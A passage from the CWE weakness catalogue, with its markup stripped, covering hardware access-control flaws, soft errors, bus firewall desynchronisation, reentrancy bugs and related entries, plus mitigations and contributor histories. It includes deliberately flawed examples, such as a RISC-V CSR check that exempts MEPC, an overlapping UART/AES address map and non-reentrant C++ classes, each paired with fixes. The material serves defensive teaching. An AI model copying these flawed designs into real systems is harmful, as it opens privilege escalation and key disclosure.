states, or decrypted data. + + ... + + localparam logic[63:0] PLICLength = 64'h03FF_FFFF; + localparam logic[63:0] UARTLength = 64'h0011_1000; + localparam logic[63:0] AESLength = 64'h0000_1000; + localparam logic[63:0] SPILength = 64'h0080_0000; + + ... + + typedef enum logic [63:0] { + + ... + PLICBase = 64'h0C00_0000, + UARTBase = 64'h1000_0000, + AESBase = 64'h1010_0000, + SPIBase = 64'h2000_0000, + ... + + + + + The vulnerable code allows the overlap between the protected MMIO region of the AES peripheral and the unprotected UART MMIO region. As a result, unprivileged users can access the protected region of the AES IP. In the given vulnerable example UART MMIO region starts at address 64'h1000_0000 and ends at address 64'h1011_1000 (UARTBase is 64'h1000_0000, and the size of the region is provided by the UARTLength of 64'h0011_1000). + On the other hand, the AES MMIO region starts at address 64'h1010_0000 and ends at address 64'h1010_1000, which implies an overlap between the two peripherals' memory regions. Thus, any user with access to the UART can read or write the AES MMIO region, e.g., the AES secret key. + To mitigate this issue, remove the overlapping address regions by decreasing the size of the UART memory region or adjusting memory bases for all the remaining peripherals. [REF-1339] + + ... + + localparam logic[63:0] PLICLength = 64'h03FF_FFFF; + localparam logic[63:0] UARTLength = 64'h0000_1000; + localparam logic[63:0] AESLength = 64'h0000_1000; + localparam logic[63:0] SPILength = 64'h0080_0000; + + ... + + typedef enum logic [63:0] { + + ... + PLICBase = 64'h0C00_0000, + UARTBase = 64'h1000_0000, + AESBase = 64'h1010_0000, + SPIBase = 64'h2000_0000, + ... + + + + + + + + + CVE-2008-7096 + virtualization product allows compromise of hardware product by accessing certain remapping registers. + https://www.cve.org/CVERecord?id=CVE-2008-7096 + + + [REF-1100] + processor design flaw allows ring 0 code to access more privileged rings by causing a register window to overlap a range of protected system RAM [REF-1100] + https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-10 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-12-10 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Observed_Examples, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Demonstrative_Examples, Mapping_Notes, References + + + Narasimha Kumar V Mangipudi + Lattice Semiconductor + 2021-10-20 + suggested content improvements + + + Hareesh Khattri + Intel Corporation + 2021-10-22 + suggested observed examples + + + Shaza Zeitoni + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Mohamadreza Rostami + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Pouya Mahmoody + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Ahmad-Reza Sadeghi + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Rahul Kande + Texas A&M University + 2023-06-21 + suggested demonstrative example + + + Chen Chen + Texas A&M University + 2023-06-21 + suggested demonstrative example + + + Jeyavijayan Rajendran + Texas A&M University + 2023-06-21 + suggested demonstrative example + + + + + The hardware logic does not effectively handle when single-event upsets (SEUs) occur. + + Technology trends such as CMOS-transistor down-sizing, use of + new materials, and system-on-chip architectures continue to increase the + sensitivity of systems to soft errors. These errors are random, and + their causes might be internal (e.g., interconnect coupling) or external + (e.g., cosmic radiation). These soft errors are not permanent in nature + and cause temporary bit flips known as single-event upsets (SEUs). + SEUs are induced errors in circuits caused when charged particles lose + energy by ionizing the medium through which they pass, leaving behind a + wake of electron-hole pairs that cause temporary failures. If these + failures occur in security-sensitive modules in a chip, it might + compromise the security guarantees of the chip. For instance, these + temporary failures could be bit flips that change the privilege of + a regular user to root. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Availability + Access Control + DoS: Crash, Exit, or Restart + DoS: Instability + Gain Privileges or Assume Identity + Bypass Protection Mechanism + + + + + Architecture and Design + + Implement triple-modular redundancy around security-sensitive modules. + + + + Architecture and Design + + SEUs mostly affect SRAMs. For SRAMs storing security-critical data, implement Error-Correcting-Codes (ECC) and Address Interleaving. + + + + + + This is an example from [REF-1089]. See the reference for full details of this issue. + Parity is error detecting but not error correcting. + Due to single-event upsets, bits are flipped in memories. As a result, memory-parity checks fail, which results in restart and a temporary denial of service of two to three minutes. + Using error-correcting codes could have avoided the restart caused by SEUs. + + + In 2016, a security researcher, who was also a patient using a pacemaker, was on an airplane when a bit flip occurred in the pacemaker, likely due to the higher prevalence of cosmic radiation at such heights. The pacemaker was designed to account for bit flips and went into a default safe mode, which still forced the patient to go to a hospital to get it reset. The bit flip also inadvertently enabled the researcher to access the crash file, perform reverse engineering, and detect a hard-coded key. [REF-1101] + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers. + + Software commonly accesses peripherals in a System-on-Chip (SoC) or other device through a memory-mapped register interface. Malicious software could tamper with any security-critical hardware data that is accessible directly or indirectly through the register interface, which could lead to a loss of confidentiality and integrity. + + + + + + + Primary + + + + + + + + + + + Architecture and Design + This weakness may be exploited if the register interface design does not adequately protect hardware assets from software. + + + Implementation + Mis-implementation of access control policies may inadvertently allow access to hardware assets through the register interface. + + + + + Confidentiality + Integrity + Read Memory + Read Application Data + Modify Memory + Modify Application Data + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Unexpected State + Alter Execution Logic + Confidentiality of hardware assets may be violated if the protected information can be read out by software through the register interface. Registers storing security state, settings, other security-critical data may be corruptible by software without correctly implemented protections. + + + + + Manual Analysis + This is applicable in the Architecture phase before implementation started. Make sure access policy is specified for the entire memory map. Manual analysis may not ensure the implementation is correct. + Moderate + + + Manual Analysis + Registers controlling hardware should have access control implemented. This access control may be checked manually for correct implementation. Items to check consist of how are trusted parties set, how are trusted parties verified, how are accesses verified, etc. Effectiveness of a manual analysis will vary depending upon how complicated the interface is constructed. + Moderate + + + Simulation / Emulation + Functional simulation is applicable during the Implementation Phase. Testcases must be created and executed for memory mapped registers to verify adherence to the access control policy. This method can be effective, since functional verification needs to be performed on the design, and verification for this weakness will be included. There can be difficulty covering the entire memory space during the test. + Moderate + + + Formal Verification + Formal verification is applicable during the Implementation phase. Assertions need to be created in order to capture illegal register access scenarios and prove that they cannot occur. Formal methods are exhaustive and can be very effective, but creating the cases for large designs may be complex and difficult. + High + + + Automated Analysis + Information flow tracking can be applicable during the Implementation phase. Security sensitive data (assets) - for example, as stored in registers - is automatically tracked over time through the design to verify the data doesn't reach illegal destinations that violate the access policies for the memory map. This method can be very effective when used together with simulation and emulation, since detecting violations doesn't rely on specific scenarios or data values. This method does rely on simulation and emulation, so testcases must exist in order to use this method. + High + + + Architecture or Design Review + Manual documentation review of the system memory map, register specification, and permissions associated with accessing security-relevant functionality exposed via memory-mapped registers. + Moderate + + + Fuzzing + Perform penetration testing (either manual or semi-automated with fuzzing) to verify that access control mechanisms such as the memory protection units or on-chip bus firewall settings adequately protect critical hardware registers from software access. + Moderate + + + + + Architecture and Design + Design proper policies for hardware register access from software. + + + Implementation + Ensure that access control policies for register access are implemented in accordance with the specified design. + + + + + The register interface provides software access to hardware functionality. This functionality is an attack surface. This attack surface may be used to run untrusted code on the system through the register interface. As an example, cryptographic accelerators require a mechanism for software to select modes of operation and to provide plaintext or ciphertext data to be encrypted or decrypted as well as other functions. This functionality is commonly provided through registers. + Cryptographic key material stored in registers inside the cryptographic accelerator can be accessed by software. + Key material stored in registers should never be accessible to software. Even if software can provide a key, all read-back paths to software should be disabled. + + + The example code is taken from the Control/Status Register (CSR) module inside the processor core of the HACK@DAC'19 buggy CVA6 SoC [REF-1340]. In RISC-V ISA [REF-1341], the CSR file contains different sets of registers with different privilege levels, e.g., user mode (U), supervisor mode (S), hypervisor mode (H), machine mode (M), and debug mode (D), with different read-write policies, read-only (RO) and read-write (RW). For example, machine mode, which is the highest privilege mode in a RISC-V system, registers should not be accessible in user, supervisor, or hypervisor modes. + The vulnerable example code allows the machine exception program counter (MEPC) register to be accessed from a user mode program by excluding the MEPC from the access control check. MEPC as per the RISC-V specification can be only written or read by machine mode code. Thus, the attacker in the user mode can run code in machine mode privilege (privilege escalation). + + if (csr_we || csr_read) begin + + if ((riscv::priv_lvl_t'(priv_lvl_o & csr_addr.csr_decode.priv_lvl) != csr_addr.csr_decode.priv_lvl) && !(csr_addr.address==riscv::CSR_MEPC)) begin + + csr_exception_o.cause = riscv::ILLEGAL_INSTR; + csr_exception_o.valid = 1'b1; + + end + // check access to debug mode only CSRs + if (csr_addr_i[11:4] == 8'h7b && !debug_mode_q) begin + + csr_exception_o.cause = riscv::ILLEGAL_INSTR; + csr_exception_o.valid = 1'b1; + + end + + end + + + To mitigate the issue, fix the privilege check so that it throws an Illegal Instruction Exception for user mode accesses to the MEPC register. [REF-1345] + + if (csr_we || csr_read) begin + + if ((riscv::priv_lvl_t'(priv_lvl_o & csr_addr.csr_decode.priv_lvl) != csr_addr.csr_decode.priv_lvl)) begin + + csr_exception_o.cause = riscv::ILLEGAL_INSTR; + csr_exception_o.valid = 1'b1; + + end + // check access to debug mode only CSRs + if (csr_addr_i[11:4] == 8'h7b && !debug_mode_q) begin + + csr_exception_o.cause = riscv::ILLEGAL_INSTR; + csr_exception_o.valid = 1'b1; + + end + + end + + + + + + + CVE-2014-2915 + virtualization product does not restrict access to debug and other processor registers in the hardware, allowing a crash of the host or guest OS + https://www.cve.org/CVERecord?id=CVE-2014-2915 + + + CVE-2021-3011 + virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code + https://www.cve.org/CVERecord?id=CVE-2021-3011 + + + CVE-2020-12446 + Driver exposes access to Model Specific Register (MSR) registers, allowing admin privileges. + https://www.cve.org/CVERecord?id=CVE-2020-12446 + + + CVE-2015-2150 + Virtualization product does not restrict access to PCI command registers, allowing host crash from the guest. + https://www.cve.org/CVERecord?id=CVE-2015-2150 + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Nicole Fern + Tortuga Logic + 2020-05-08 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Demonstrative_Examples, Mapping_Notes, References + + + Anders Nordstrom, Alric Althoff + Tortuga Logic + 2021-10-11 + Provided detection methods and observed examples + + + Nicole Fern + Riscure + 2021-10-12 + Provided detection methods + + + Shaza Zeitoni + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Mohamadreza Rostami + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Pouya Mahmoody + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Ahmad-Reza Sadeghi + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Rahul Kande + Texas A&M University + 2023-06-21 + suggested demonstrative example + + + Chen Chen + Texas A&M University + 2023-06-21 + suggested demonstrative example + + + Jeyavijayan Rajendran + Texas A&M University + 2023-06-21 + suggested demonstrative example + + Register Interface Allows Software Access to Sensitive Data or Security Settings + + + + The product is designed with access restricted to certain information, but it does not sufficiently protect against an unauthorized actor with physical access to these areas. + Sections of a product intended to have restricted access may be inadvertently or intentionally rendered accessible when the implemented physical protections are insufficient. The specific requirements around how robust the design of the physical protection mechanism needs to be depends on the type of product being protected. Selecting the correct physical protection mechanism and properly enforcing it through implementation and manufacturing are critical to the overall physical security of the product. + + + + + + + + + + + + + + Architecture and Design + This weakness can arise if design decisions are made that do not align with the intended physical protection of the product + + + Manufacturing + While the architecture and design phase of the product may have accurately met the intended robustness for product physical protections, this phase may introduce the weakness through errors in physically manufacturing the product. + + + + + Confidentiality + Integrity + Access Control + Varies by Context + + + + + Architecture and Design + Specific protection requirements depend strongly on contextual factors including the level of acceptable risk associated with compromise to the product's protection mechanism. Designers could incorporate anti-tampering measures that protect against or detect when the product has been tampered with. + + + Testing + The testing phase of the lifecycle should establish a method for determining whether the protection mechanism is sufficient to prevent unauthorized access. + + + Manufacturing + Ensure that all protection mechanisms are fully activated at the time of manufacturing and distribution. + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2020-05-28 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Description + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Insufficient Physical Protection Mechanism + + + + The hardware logic for error handling and security checks can incorrectly forward data before the security check is complete. + + Many high-performance on-chip bus protocols and processor data-paths employ separate channels for control and data to increase parallelism and maximize throughput. Bugs in the hardware logic that handle errors and security checks can make it possible for data to be forwarded before the completion of the security checks. If the data can propagate to a location in the hardware observable to an attacker, loss of data confidentiality can occur. 'Meltdown' is a concrete example of how de-synchronization between data and permissions checking logic can violate confidentiality requirements. Data loaded from a page marked as privileged was returned to the cpu regardless of current privilege level for performance reasons. The assumption was that the cpu could later remove all traces of this data during the handling of the illegal memory access exception, but this assumption was proven false as traces of the secret data were not removed from the microarchitectural state. + + + + + + + + Primary + + + + + + + + + + + Architecture and Design + The weakness can be introduced in the data transfer or bus protocol itself or in the implementation. + + + Implementation + + + + + Confidentiality + Read Memory + Read Application Data + + + + + Architecture and Design + + Thoroughly verify the data routing logic to ensure that any error handling or security checks effectively block illegal dataflows. + + + + + + There are several standard on-chip bus protocols used in modern SoCs to allow communication between components. There are a wide variety of commercially available hardware IP implementing the interconnect logic for these protocols. A bus connects components which initiate/request communications such as processors and DMA controllers (bus masters) with peripherals which respond to requests. In a typical system, the privilege level or security designation of the bus master along with the intended functionality of each peripheral determine the security policy specifying which specific bus masters can access specific peripherals. This security policy (commonly referred to as a bus firewall) can be enforced using separate IP/logic from the actual interconnect responsible for the data routing. + The firewall and data routing logic becomes de-synchronized due to a hardware logic bug allowing components that should not be allowed to communicate to share data. For example, consider an SoC with two processors. One is being used as a root of trust and can access a cryptographic key storage peripheral. The other processor (application cpu) may run potentially untrusted code and should not access the key store. If the application cpu can issue a read request to the key store which is not blocked due to de-synchronization of data routing and the bus firewall, disclosure of cryptographic keys is possible. + All data is correctly buffered inside the interconnect until the firewall has determined that the endpoint is allowed to receive the data. + + + + + CVE-2017-5754 + Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. + https://www.cve.org/CVERecord?id=CVE-2017-5754 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.9, members of the CWE Hardware SIG are closely analyzing this entry and others to improve CWE's coverage of transient execution weaknesses, which include issues related to Spectre, Meltdown, and other attacks. Additional investigation may include other weaknesses related to microarchitectural state. As a result, this entry might change significantly in CWE 4.10. + + + + Nicole Fern + Tortuga Logic + 2020-05-22 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-10-13 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + During execution of non-reentrant code, the product performs a call that unintentionally produces a nested invocation of the non-reentrant code. + In a complex product, a single function call may lead to many different possible code paths, some of which may involve deeply nested calls. It may be difficult to foresee all possible code paths that could emanate from a given function call. In some systems, an external actor can manipulate inputs to the system and thereby achieve a wide range of possible control flows. This is frequently a concern in products that execute scripts from untrusted sources. Examples of such products are web browsers and PDF readers. A weakness is present when one of the possible code paths resulting from a function call alters program state that the original caller assumes to be unchanged during the call. + + + + + + + + Primary + + + + + + + + Integrity + Unexpected State + Unknown + Exploitation of this weakness can leave the application in an unexpected state and cause variables to be reassigned before the first invocation has completed. This may eventually result in memory corruption or unexpected code execution. + + + + + Architecture and Design + When architecting a system that will execute untrusted code in response to events, consider executing the untrusted event handlers asynchronously (asynchronous message passing) as opposed to executing them synchronously at the time each event fires. The untrusted code should execute at the start of the next iteration of the thread's message loop. In this way, calls into non-reentrant code are strictly serialized, so that each operation completes fully before the next operation begins. Special attention must be paid to all places where type coercion may result in script execution. Performing all needed coercions at the very beginning of an operation can help reduce the chance of operations executing at unexpected junctures. + High + + + Implementation + Make sure the code (e.g., function or class) in question is reentrant by not leveraging non-local data, not modifying its own code, and not calling other non-reentrant code. + High + + + + + The implementation of the Widget class in the following C++ code is an example of code that is not designed to be reentrant. If an invocation of a method of Widget inadvertently produces a second nested invocation of a method of Widget, then data member backgroundImage may unexpectedly change during execution of the outer call. + class Widget{private:Image* backgroundImage;public:void click(){if (backgroundImage){backgroundImage->click();}}void changeBackgroundImage(Image* newImage){if (backgroundImage){delete backgroundImage;}backgroundImage = newImage;}}class Image{public:void click(){scriptEngine->fireOnImageClick();/* perform some operations using "this" pointer */}} + Looking closer at this example, Widget::click() calls backgroundImage->click(), which in turn calls scriptEngine->fireOnImageClick(). The code within fireOnImageClick() invokes the appropriate script handler routine as defined by the document being rendered. In this scenario this script routine is supplied by an adversary and this malicious script makes a call to Widget::changeBackgroundImage(), deleting the Image object pointed to by backgroundImage. When control returns to Image::click, the function's backgroundImage "this" pointer (which is the former value of backgroundImage) is a dangling pointer. The root of this weakness is that while one operation on Widget (click) is in the midst of executing, a second operation on the Widget object may be invoked (in this case, the second invocation is a call to different method, namely changeBackgroundImage) that modifies the non-local variable. + + + This is another example of C++ code that is not designed to be reentrant. + class Request{private:std::string uri;/* ... */public:void setup(ScriptObject* _uri){this->uri = scriptEngine->coerceToString(_uri);/* ... */}void send(ScriptObject* _data){Credentials credentials = GetCredentials(uri);std::string data = scriptEngine->coerceToString(_data);doSend(uri, credentials, data);}} + The expected order of operations is a call to Request::setup(), followed by a call to Request::send(). Request::send() calls scriptEngine->coerceToString(_data) to coerce a script-provided parameter into a string. This operation may produce script execution. For example, if the script language is ECMAScript, arbitrary script execution may result if _data is an adversary-supplied ECMAScript object having a custom toString method. If the adversary's script makes a new call to Request::setup, then when control returns to Request::send, the field uri and the local variable credentials will no longer be consistent with one another. As a result, credentials for one resource will be shared improperly with a different resource. The root of this weakness is that while one operation on Request (send) is in the midst of executing, a second operation may be invoked (setup). + + + + + CVE-2014-1772 + In this vulnerability, by registering a malicious onerror handler, an adversary can produce unexpected re-entrance of a CDOMRange object. [REF-1098] + https://www.cve.org/CVERecord?id=CVE-2014-1772 + + + CVE-2018-8174 + This CVE covers several vulnerable scenarios enabled by abuse of the Class_Terminate feature in Microsoft VBScript. In one scenario, Class_Terminate is used to produce an undesirable re-entrance of ScriptingDictionary during execution of that object's destructor. In another scenario, a vulnerable condition results from a recursive entrance of a property setter method. This recursive invocation produces a second, spurious call to the Release method of a reference-counted object, causing a UAF when that object is freed prematurely. This vulnerability pattern has been popularized as "Double Kill". [REF-1099] + https://www.cve.org/CVERecord?id=CVE-2018-8174 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Simon Zuckerbraun + Trend Micro + 2018-12-20 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly provide a capability for the product administrator to remove sensitive data at the time the product is decommissioned. A scrubbing capability could be missing, insufficient, or incorrect. + + When a product is decommissioned - i.e., taken out of service - best practices or regulatory requirements may require the administrator to remove or overwrite sensitive data first, i.e. "scrubbing." Improper scrubbing of sensitive data from a decommissioned device leaves that data vulnerable to acquisition by a malicious actor. Sensitive data may include, but is not limited to, device/manufacturer proprietary information, user/device credentials, network configurations, and other forms of sensitive data. + + + + + + + + + + + + + Architecture and Design + + + Policy + + + Implementation + + + + + Confidentiality + Read Memory + + + + + Architecture and Design + + Functionality to completely scrub data from a product at the conclusion of its lifecycle should be part of the design phase. Trying to add this function on top of an existing architecture could lead to incomplete removal of sensitive information/data. + + + + Policy + + The manufacturer should describe the location(s) where sensitive data is stored and the policies and procedures for its removal. This information may be conveyed, for example, in an Administrators Guide or a Statement of Volatility. + + + + Implementation + + If the capability to wipe sensitive data isn't built-in, the manufacturer may need to provide a utility to scrub sensitive data from storage if that data is located in a place which is non-accessible by the administrator. One example of this could be when sensitive data is stored on an EEPROM for which there is no user/admin interface provided by the system. + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + Paul A. Wortman + Wells Fargo + 2020-05-28 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an obsolete encoding mechanism to implement access controls. + + Within a System-On-a-Chip (SoC), various circuits and hardware engines generate transactions for the purpose of accessing (read/write) assets or performing various actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (identifying the originator of the transaction) and a destination identity (routing the transaction to the respective entity). Sometimes the transactions are qualified with a Security Token. This Security Token helps the destination agent decide on the set of allowed actions (e.g., access to an asset for reads and writes). A policy encoder is used to map the bus transactions to Security Tokens that in turn are used as access-controls/protection mechanisms. A common weakness involves using an encoding which is no longer trusted, i.e., an obsolete encoding. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + Modify Files or Directories + Read Files or Directories + DoS: Resource Consumption (Other) + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Reduce Reliability + High + + + + + Architecture and Design + Implementation + + Security Token Decoders should be reviewed for design inconsistency and common weaknesses. + Access and programming flows should be tested in both pre-silicon and post-silicon testing. + + High + + + + + + For example, consider a system that has four bus masters. The table below provides bus masters, their Security Tokens, and trust assumptions. + + + Bus Master + Security Token Decoding + Trust Assumptions + + + Master_0 + "00" + Untrusted + + + Master_1 + "01" + Trusted + + + Master_2 + "10" + Untrusted + + + Master_3 + "11" + Untrusted + + + The policy encoding is to be defined such that Security Token will be used in implemented access-controls. The bits in the bus transaction that contain Security-Token information are Bus_transaction [15:11]. The assets are the AES-Key registers for encryption or decryption. The key of 128 bits is implemented as a set of four, 32-bit registers. + + + Register + Field description + + + AES_ENC_DEC_KEY_0 + AES key [0:31] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_1 + AES key [32:63] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_2 + AES key [64:95] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_4 + AES key [96:127] for encryption or decryption, Default 0x00000000 + + + Below is an example of a policy encoding scheme inherited from a previous project where all "ODD" numbered Security Tokens are trusted. + + + If (Bus_transaction[14] == "1")Trusted = "1"ElseTrusted = "0" + If (trusted)Allow access to AES-Key registersElseDeny access to AES-Key registers + + The inherited policy encoding is obsolete and does not work for the new system where an untrusted bus master with an odd Security Token exists in the system, i.e., Master_3 whose Security Token is "11". Based on the old policy, the untrusted bus master (Master_3) has access to the AES-Key registers. To resolve this, a register AES_KEY_ACCESS_POLICY can be defined to provide necessary, access controls: + + New Policy: + + + AES_KEY_ACCESS_POLICY + [31:0] Default 0x00000002 - agent with Security Token "1" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers + + + The AES_KEY_ACCESS_POLICY register defines which agents with a Security Token in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a Security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., "1") allows respective action from an agent whose identity matches the number of the bit and, if "0" (i.e., Clear), disallows the respective action to that corresponding agent. Thus, any bus master with Security Token "01" is allowed access to the AES-Key registers. Below is the Pseudo Code for policy encoding: + + + Security_Token[4:0] = Bus_transaction[15:11] + If (AES_KEY_ACCESS_POLICY[Security_Token] == "1")Allow access to AES-Key registersElseDeny access to AES-Key registers + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-04-18 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies. + + + Integrated circuits and hardware engines may provide access to resources (device-configuration, encryption keys, etc.) belonging to trusted firmware or software modules (commonly set by a BIOS or a bootloader). These accesses are typically controlled and limited by the hardware. Hardware design access control is sometimes implemented using a policy. A policy defines which entity or agent may or may not be allowed to perform an action. When a system implements multiple levels of policies, a control policy may allow direct access to a resource as well as changes to the policies themselves. + Resources that include agents in their control policy but not in their write policy could unintentionally allow an untrusted agent to insert itself in the write policy register. Inclusion in the write policy register could allow a malicious or misbehaving agent write access to resources. This action could result in security compromises including leaked information, leaked encryption keys, or modification of device configuration. + + + + + + + + + + + + + Architecture and Design + This weakness may be introduced during the design of a device when the architect does not comprehensively specify all of the policies required by an agent. + + + Implementation + This weakness may be introduced during implementation if device policy restrictions do not sufficiently constrain less-privileged clients. + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Read Files or Directories + Reduce Reliability + High + + + + + Architecture and Design + Implementation + Access-control-policy definition and programming flow must be sufficiently tested in pre-silicon and post-silicon testing. + + 